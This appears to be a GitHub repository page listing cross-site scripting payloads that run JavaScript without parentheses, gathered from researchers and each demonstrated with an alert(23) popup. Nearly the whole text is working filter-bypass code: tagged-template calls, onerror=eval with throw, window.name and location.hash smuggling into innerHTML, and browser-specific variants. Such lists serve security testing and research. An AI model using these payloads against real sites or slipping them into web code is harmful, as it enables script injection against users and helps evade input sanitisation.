Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
1 contributor

Users who have contributed to this file

203 lines (125 sloc) 4.22 KB

XSS Without parentheses ()

This repo contains XSS payloads that doesn't require parentheses, collected from tweets, blogs...

All the POC's are alert box with number 23


alert`23`

window.name="javascript:alert(23)";
location="xss.html";

xss.html

location=name

Cure53

eval.call`${'alert\x2823\x29'}`

Renwa

eval.apply`${[`alert\x2823\x29`]}`

Bo0oM

setTimeout`alert\x2823\x29`
setInterval`alert\x2823\x29`

Garethheyes

onerror=alert;throw 23;

Garethheyes

'alert\x2823\x29'instanceof{[Symbol.hasInstance]:eval}

Only Chrome Garethheyes

onerror=eval;throw'=alert\x2823\x29';

Garethheyes

{onerror=alert}throw 23

terjanq

xss_redir.html

window.name='1;var Uncaught=1;alert(23)';
location='xss_short.html';

xss_short.html

{onerror=eval}throw/0/+name

terjanq

throw/a/,Uncaught=1,g=alert,a=g+0,onerror=eval,/1/g+a[14]+[23,331,337]+a[15]

terjanq

window.name="alert(23)";
location="xss.html";

xss.html

Function`a${name}```

Only Firefox Garethheyes

{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:'',message:'alert\x2823\x29'}

ycam

example.com/xss#*/;alert(23);
throw/**/onerror=Uncaught=eval,e={lineNumber:1,columnNumber:1,fileName:'',message:'/*'+location.hash},typeof/**/InstallTrigger!='undefined'?e:e.message

cgvwzq

https://demo.vwzq.net/lol.html

<script/id=Uncaught>

// chrome + firefox

throw[onerror=eval][e=[x=/-alert(1)/.source]]=0[e.lineNumber=e.columnNumber=e.fileName=e.message=x]=e

</script>

<script>

// firefox

onhashchange=setTimeout,HashChangeEvent.prototype[Symbol.toStringTag]=/=alert(2)/.source,location.hash=1

</script>

<script>

// chrome + firefox

Array.prototype[Symbol.hasInstance]=eval,'alert(3)'instanceof[]

</script>

<script>

// chrome

[onerror=eval][TypeError.prototype.name='=/']['/-alert(4)//']

</script>

<script>

// chrome

onerror=eval,ReferenceError.prototype.name='=alert(5)//',lol

</script>

Renwa

document.body.innerHTML="\u003cimg src=x onerror=alert\u002823\u0029\u003e";

Renwa

document.body.innerHTML="&ltimg src=x onerror=alert&lpar;23&rpar;&gt"
document.body.innerHTML=document.body.innerText

If the page is frameable Renwa

data:text/html,<iframe name="<svg/onload=alert(23)>" src="http://example.com/xss?document.body.innerHTML=name">

user00239123

document.location='javascript:alert%2823%29'

Only IE matt

example.com/xss#<img src=x onerror=alert(23)>

document.body.innerHTML=location.hash;

Brutelogic

<svg/onload='alert&#40 23 &#41'> 

Blakils

location=/javascript:alert%2823%29/.source;

Nicocanicolas

http://example.com/?test=&lt;img/src=&quot;x&quot;/onerror=alert(23)&gt;

document.body.innerHTML=location.search;
document.body.innerHTML=document.body.innerText;


Anything: @RenwaX23

You can’t perform that action at this time.